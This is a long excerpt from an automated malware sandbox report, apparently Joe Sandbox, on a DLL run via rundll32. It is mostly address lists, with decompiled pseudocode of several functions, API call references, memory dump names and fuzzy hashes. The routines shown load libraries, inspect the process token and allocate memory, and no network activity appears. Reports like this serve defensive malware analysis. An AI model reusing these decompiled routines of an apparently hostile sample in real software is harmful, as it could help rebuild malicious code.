                                                                                                                                                                                                                                                                            0x10001498
                                                                                                                                                                                                                                                                            0x1000149f
                                                                                                                                                                                                                                                                            0x100014a7
                                                                                                                                                                                                                                                                            0x100014aa
                                                                                                                                                                                                                                                                            0x100014ab
                                                                                                                                                                                                                                                                            0x100014ab
                                                                                                                                                                                                                                                                            0x100014ae
                                                                                                                                                                                                                                                                            0x100014b1
                                                                                                                                                                                                                                                                            0x100014b1
                                                                                                                                                                                                                                                                            0x100014be
                                                                                                                                                                                                                                                                            0x100014c4
                                                                                                                                                                                                                                                                            0x100014c9
                                                                                                                                                                                                                                                                            0x100014d1
                                                                                                                                                                                                                                                                            0x100014e0
                                                                                                                                                                                                                                                                            0x100014e5
                                                                                                                                                                                                                                                                            0x100014ec
                                                                                                                                                                                                                                                                            0x100014ed
                                                                                                                                                                                                                                                                            0x100014ee
                                                                                                                                                                                                                                                                            0x100014f4
                                                                                                                                                                                                                                                                            0x100014fe
                                                                                                                                                                                                                                                                            0x10001504
                                                                                                                                                                                                                                                                            0x1000150e
                                                                                                                                                                                                                                                                            0x1000150f
                                                                                                                                                                                                                                                                            0x10001510
                                                                                                                                                                                                                                                                            0x10001510
                                                                                                                                                                                                                                                                            0x10001515
                                                                                                                                                                                                                                                                            0x1000151e
                                                                                                                                                                                                                                                                            0x10001525
                                                                                                                                                                                                                                                                            0x1000152a
                                                                                                                                                                                                                                                                            0x1000152d
                                                                                                                                                                                                                                                                            0x1000152d
                                                                                                                                                                                                                                                                            0x10001533
                                                                                                                                                                                                                                                                            0x10001547
                                                                                                                                                                                                                                                                            0x1000154c
                                                                                                                                                                                                                                                                            0x1000154e
                                                                                                                                                                                                                                                                            0x10001551
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10001558
                                                                                                                                                                                                                                                                            0x10001558
                                                                                                                                                                                                                                                                            0x10001564
                                                                                                                                                                                                                                                                            0x10001569
                                                                                                                                                                                                                                                                            0x1000156e
                                                                                                                                                                                                                                                                            0x10001570
                                                                                                                                                                                                                                                                            0x10001576
                                                                                                                                                                                                                                                                            0x1000157d
                                                                                                                                                                                                                                                                            0x1000157d
                                                                                                                                                                                                                                                                            0x1000157e
                                                                                                                                                                                                                                                                            0x1000157f
                                                                                                                                                                                                                                                                            0x10001589
                                                                                                                                                                                                                                                                            0x100015ac
                                                                                                                                                                                                                                                                            0x100015ac
                                                                                                                                                                                                                                                                            0x100015b2
                                                                                                                                                                                                                                                                            0x100015b7
                                                                                                                                                                                                                                                                            0x100015be
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000158b
                                                                                                                                                                                                                                                                            0x1000158b
                                                                                                                                                                                                                                                                            0x1000158b
                                                                                                                                                                                                                                                                            0x10001592
                                                                                                                                                                                                                                                                            0x10001597
                                                                                                                                                                                                                                                                            0x10001599
                                                                                                                                                                                                                                                                            0x1000159e
                                                                                                                                                                                                                                                                            0x1000159f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100015a1
                                                                                                                                                                                                                                                                            0x100015a1
                                                                                                                                                                                                                                                                            0x100015a8
                                                                                                                                                                                                                                                                            0x100015c0
                                                                                                                                                                                                                                                                            0x100015c5
                                                                                                                                                                                                                                                                            0x100015c7
                                                                                                                                                                                                                                                                            0x100015c9
                                                                                                                                                                                                                                                                            0x100015c9
                                                                                                                                                                                                                                                                            0x100015c9
                                                                                                                                                                                                                                                                            0x100015c7
                                                                                                                                                                                                                                                                            0x100015a8
                                                                                                                                                                                                                                                                            0x1000159f
                                                                                                                                                                                                                                                                            0x100015ce
                                                                                                                                                                                                                                                                            0x100015ce
                                                                                                                                                                                                                                                                            0x100014d3
                                                                                                                                                                                                                                                                            0x100014d3
                                                                                                                                                                                                                                                                            0x100014d3
                                                                                                                                                                                                                                                                            0x100015d3

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,10001005), ref: 100014FE
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 10001558
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4203272843-0
                                                                                                                                                                                                                                                                            • Opcode ID: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
                                                                                                                                                                                                                                                                            • Instruction ID: 9803195fefc7d3444036e0c450886d7b2dbb09160fb97233c97d75cf6d5bf9ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6531E279640311EFF320DBA4DD8AEDA37E9EF457D1F110076F4029B596DA30E9428B60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                                                                            			E10009559(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                                                                            				char _t5;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t7;
                                                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(_t15);
                                                                                                                                                                                                                                                                            				_t23 = __edx;
                                                                                                                                                                                                                                                                            				_t13 = _t15;
                                                                                                                                                                                                                                                                            				_t5 = E10009192(_t15, _a4);
                                                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                                                            				_v8 = _t5;
                                                                                                                                                                                                                                                                            				_push(_t5);
                                                                                                                                                                                                                                                                            				if(_a4 != 0x26e) {
                                                                                                                                                                                                                                                                            					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t7 = GetModuleHandleA();
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                                                                            					_t11 = E1000950E(_t13, _t23, _t7); // executed
                                                                                                                                                                                                                                                                            					_t26 = _t11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E10009E14( &_v8);
                                                                                                                                                                                                                                                                            				return _t26;
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x1000955c
                                                                                                                                                                                                                                                                            0x10009563
                                                                                                                                                                                                                                                                            0x10009565
                                                                                                                                                                                                                                                                            0x10009567
                                                                                                                                                                                                                                                                            0x1000956d
                                                                                                                                                                                                                                                                            0x1000956f
                                                                                                                                                                                                                                                                            0x10009579
                                                                                                                                                                                                                                                                            0x1000957a
                                                                                                                                                                                                                                                                            0x10009589
                                                                                                                                                                                                                                                                            0x1000957c
                                                                                                                                                                                                                                                                            0x1000957c
                                                                                                                                                                                                                                                                            0x1000957c
                                                                                                                                                                                                                                                                            0x1000958d
                                                                                                                                                                                                                                                                            0x10009594
                                                                                                                                                                                                                                                                            0x1000959a
                                                                                                                                                                                                                                                                            0x1000959a
                                                                                                                                                                                                                                                                            0x100095a0
                                                                                                                                                                                                                                                                            0x100095ac

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 1000957C
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 10009589
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4133054770-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
                                                                                                                                                                                                                                                                            • Instruction ID: 48a61f66a5c8936508bf55f1dd811003d18238d90fe045da648be771be27a9d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DEF08272704215ABFB15DFAADC4984FBBEDDB882E1721442AF405D7255ED70DD4087A0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E10001000() {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E10001494(_t4, _t5);
                                                                                                                                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x10001000
                                                                                                                                                                                                                                                                            0x1000100c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 1000100C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                                            • Opcode ID: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
                                                                                                                                                                                                                                                                            • Instruction ID: 88ff7d305c733faf0802a1b78d92611ba7a1ab07d9a96955826befa5b791335c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58B012303401408FFB40C770C949FAD33D0AB0C302F4948B0F109CE46BDA205002C710
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 47%
                                                                                                                                                                                                                                                                            			E1000DD67(void* __ecx, void* __esi) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                                                            				char _t37;
                                                                                                                                                                                                                                                                            				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                                                                                                            				char _t45;
                                                                                                                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t37 = 0;
                                                                                                                                                                                                                                                                            				_v28 = 0x500;
                                                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                                                                            				_t20 = E1000DC3C(__ecx);
                                                                                                                                                                                                                                                                            				_v16 = _t20;
                                                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                                                            					_push( &_v24);
                                                                                                                                                                                                                                                                            					_t44 = 2;
                                                                                                                                                                                                                                                                            					_t21 = E1000DC93(_t44); // executed
                                                                                                                                                                                                                                                                            					_t48 = _t21;
                                                                                                                                                                                                                                                                            					_v20 = _t48;
                                                                                                                                                                                                                                                                            					if(_t48 == 0) {
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v16);
                                                                                                                                                                                                                                                                            						if(_t48 != 0) {
                                                                                                                                                                                                                                                                            							E10009203( &_v20, _t37);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _t45;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_push( &_v12);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0x220);
                                                                                                                                                                                                                                                                            					_push(0x20);
                                                                                                                                                                                                                                                                            					_push(2);
                                                                                                                                                                                                                                                                            					_push( &_v32);
                                                                                                                                                                                                                                                                            					_t29 =  *0x10020fc8; // 0x466fb00
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *_t48 <= 0) {
                                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                                            						_t31 =  *0x10020fc8; // 0x466fb00
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                                                                                                            					_t33 = _t9;
                                                                                                                                                                                                                                                                            					_v8 = _t33;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                                                                            						_push( *_t33);
                                                                                                                                                                                                                                                                            						_t34 =  *0x10020fc8; // 0x466fb00
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t37 = _t37 + 1;
                                                                                                                                                                                                                                                                            						_t33 = _v8 + 8;
                                                                                                                                                                                                                                                                            						_v8 = _t33;
                                                                                                                                                                                                                                                                            						if(_t37 <  *_t48) {
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t45 = 1;
                                                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t20;
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x1000dd6e
                                                                                                                                                                                                                                                                            0x1000dd70
                                                                                                                                                                                                                                                                            0x1000dd77
                                                                                                                                                                                                                                                                            0x1000dd79
                                                                                                                                                                                                                                                                            0x1000dd7c
                                                                                                                                                                                                                                                                            0x1000dd81
                                                                                                                                                                                                                                                                            0x1000dd86
                                                                                                                                                                                                                                                                            0x1000dd90
                                                                                                                                                                                                                                                                            0x1000dd93
                                                                                                                                                                                                                                                                            0x1000dd96
                                                                                                                                                                                                                                                                            0x1000dd9b
                                                                                                                                                                                                                                                                            0x1000dd9d
                                                                                                                                                                                                                                                                            0x1000dda3
                                                                                                                                                                                                                                                                            0x1000de03
                                                                                                                                                                                                                                                                            0x1000de0b
                                                                                                                                                                                                                                                                            0x1000de11
                                                                                                                                                                                                                                                                            0x1000de18
                                                                                                                                                                                                                                                                            0x1000de1e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000de1f
                                                                                                                                                                                                                                                                            0x1000dda8
                                                                                                                                                                                                                                                                            0x1000dda9
                                                                                                                                                                                                                                                                            0x1000ddaa
                                                                                                                                                                                                                                                                            0x1000ddab
                                                                                                                                                                                                                                                                            0x1000ddac
                                                                                                                                                                                                                                                                            0x1000ddad
                                                                                                                                                                                                                                                                            0x1000ddae
                                                                                                                                                                                                                                                                            0x1000ddaf
                                                                                                                                                                                                                                                                            0x1000ddb4
                                                                                                                                                                                                                                                                            0x1000ddb6
                                                                                                                                                                                                                                                                            0x1000ddbb
                                                                                                                                                                                                                                                                            0x1000ddbc
                                                                                                                                                                                                                                                                            0x1000ddc6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ddca
                                                                                                                                                                                                                                                                            0x1000ddf6
                                                                                                                                                                                                                                                                            0x1000ddf6
                                                                                                                                                                                                                                                                            0x1000ddfe
                                                                                                                                                                                                                                                                            0x1000de01
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000de01
                                                                                                                                                                                                                                                                            0x1000ddcc
                                                                                                                                                                                                                                                                            0x1000ddcc
                                                                                                                                                                                                                                                                            0x1000ddcf
                                                                                                                                                                                                                                                                            0x1000ddd2
                                                                                                                                                                                                                                                                            0x1000ddd2
                                                                                                                                                                                                                                                                            0x1000ddd5
                                                                                                                                                                                                                                                                            0x1000ddd7
                                                                                                                                                                                                                                                                            0x1000dde1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dde6
                                                                                                                                                                                                                                                                            0x1000dde7
                                                                                                                                                                                                                                                                            0x1000ddea
                                                                                                                                                                                                                                                                            0x1000ddef
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ddf1
                                                                                                                                                                                                                                                                            0x1000ddf5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000ddf5
                                                                                                                                                                                                                                                                            0x1000de24

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC3C: GetCurrentThread.KERNEL32 ref: 1000DC4F
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC3C: OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC3C: GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC3C: OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC93: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
                                                                                                                                                                                                                                                                              • Part of subcall function 1000DC93: GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1806447117-0
                                                                                                                                                                                                                                                                            • Opcode ID: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
                                                                                                                                                                                                                                                                            • Instruction ID: 8ff03c18bb554401d2baa437731a5e089786e4630d4b8073f2d1e287e5300e86
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0217F31A00209AFEB50EFA9DC85A9EBBF9EF48380B11407AE501E7155D770DA41CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E1000DD17(void* __ecx) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t12 =  *0x10020fc8; // 0x466fb00
                                                                                                                                                                                                                                                                            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                                                                                                                            					_t14 = E1000DD00(); // executed
                                                                                                                                                                                                                                                                            					_t23 = _t14;
                                                                                                                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v8);
                                                                                                                                                                                                                                                                            						_t17 = _t23;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						if(_v8 != _t14) {
                                                                                                                                                                                                                                                                            							_t18 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t18 + 0x34))(_v8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t17 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return _t17;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return _t13;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x1000dd1b
                                                                                                                                                                                                                                                                            0x1000dd23
                                                                                                                                                                                                                                                                            0x1000dd2b
                                                                                                                                                                                                                                                                            0x1000dd30
                                                                                                                                                                                                                                                                            0x1000dd38
                                                                                                                                                                                                                                                                            0x1000dd3d
                                                                                                                                                                                                                                                                            0x1000dd41
                                                                                                                                                                                                                                                                            0x1000dd5f
                                                                                                                                                                                                                                                                            0x1000dd62
                                                                                                                                                                                                                                                                            0x1000dd43
                                                                                                                                                                                                                                                                            0x1000dd46
                                                                                                                                                                                                                                                                            0x1000dd48
                                                                                                                                                                                                                                                                            0x1000dd50
                                                                                                                                                                                                                                                                            0x1000dd50
                                                                                                                                                                                                                                                                            0x1000dd53
                                                                                                                                                                                                                                                                            0x1000dd53
                                                                                                                                                                                                                                                                            0x1000dd66
                                                                                                                                                                                                                                                                            0x1000dd33
                                                                                                                                                                                                                                                                            0x1000dd33
                                                                                                                                                                                                                                                                            0x1000dd33

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
                                                                                                                                                                                                                                                                            • Instruction ID: 58def36bf07d7f7111ecbabf11ee3a35f78c6fb920e0af07cff530f333468cf2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF03A31A41215EFEB60EBA4DA45A8D77F8EB083C5F6500A6F501E7565D730DE00DBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E100091E7(long _a4) {
                                                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t2 =  *0x100210a8;
                                                                                                                                                                                                                                                                            				if(_t2 != 0) {
                                                                                                                                                                                                                                                                            					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
                                                                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					return _t2;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x100091ea
                                                                                                                                                                                                                                                                            0x100091f1
                                                                                                                                                                                                                                                                            0x100091fb
                                                                                                                                                                                                                                                                            0x10009202
                                                                                                                                                                                                                                                                            0x100091f4
